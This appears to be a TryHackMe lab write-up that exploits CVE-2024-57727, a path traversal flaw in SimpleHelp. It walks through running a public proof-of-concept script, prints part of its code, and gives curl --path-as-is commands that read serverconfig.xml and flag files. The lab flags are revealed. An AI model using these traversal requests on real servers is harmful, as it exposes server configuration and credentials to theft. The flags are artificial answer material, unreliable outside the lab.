# Try Hack Me/SimpleHelp

#### **Write-up / [THM / SimpleHelp: CVE-2024-57727](https://tryhackme.com/room/simplehelpcve202457727 "SimpleHelp")** 

##### by: alfreddgreat

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-04/scaled-1680-/jPaieIf0hZ2NrXT1-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-04/jPaieIf0hZ2NrXT1-image.png)

<p class="callout info">Get the python script for POC for the vulnerability in https://github.com/imjdl/CVE-2024-57727.</p>

<p class="callout success">**root@ip-10-10-65-98:~# git clone [https://github.com/imjdl/CVE-2024-57727](https://github.com/imjdl/CVE-2024-57727)**</p>

<p class="callout info">Change directory to the downloaded CVE folder.</p>

<p class="callout success">**root@ip-10-10-65-98:~/CVE-2024-57727# cd CVE-2024-57727/**</p>

<p class="callout info">Run the following python script.</p>

<p class="callout success">**root@ip-10-10-65-98:~/CVE-2024-57727# python3 poc.py [http://10.10.32.37](http://10.10.32.37)** </p>

<p class="callout success">[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-04/scaled-1680-/jDACAYEoCObBXdAN-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-04/jDACAYEoCObBXdAN-image.png)</p>

<p class="callout info">Check the poc.py script</p>

```python
def send_path_traversal_request(url: str) -> bool:    """    Send a path traversal request and get the response        Args:        url (str): Target url address    Returns:        dict: Dictionary containing response information, including status code, response content, etc.        None: Returns None if request fails    """    url = url + "/toolbox-resource/../resource1/../../configuration/serverconfig.xml"    context = ssl._create_unverified_context()    # Default request headers    default_headers = {        'Accept-Encoding': 'gzip, deflate, br',        'Accept': '*/*',        'Connection': 'keep-alive'    }
```

<p class="callout success">**root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is [http://10.10.32.37/toolbox-resource/../resource1/../../configuration/serverconfig.xml](http://10.10.32.37/toolbox-resource/../resource1/../../configuration/serverconfig.xml)**</p>

[![image.png](https://nacinocomputernetworks.com/uploads/images/gallery/2025-04/scaled-1680-/VNZaVfoUSgLGFahX-image.png)](https://nacinocomputernetworks.com/uploads/images/gallery/2025-04/VNZaVfoUSgLGFahX-image.png)

<p class="callout success">**root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt**</p>

```
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt

THM{9ND23PVA}

"Choose your path wisely, but your shoes comfortably."

"Traverse lightly, laugh loudly."
```

<p class="callout danger">**THM{9ND23PVA}**</p>

<p class="callout success">**root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt**  
</p>

```
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt

THM{X8733EEZ}


"Some paths are meant to be traversed; others just lead to a 404."

```

<p class="callout danger">**THM{X8733EEZ}**</p>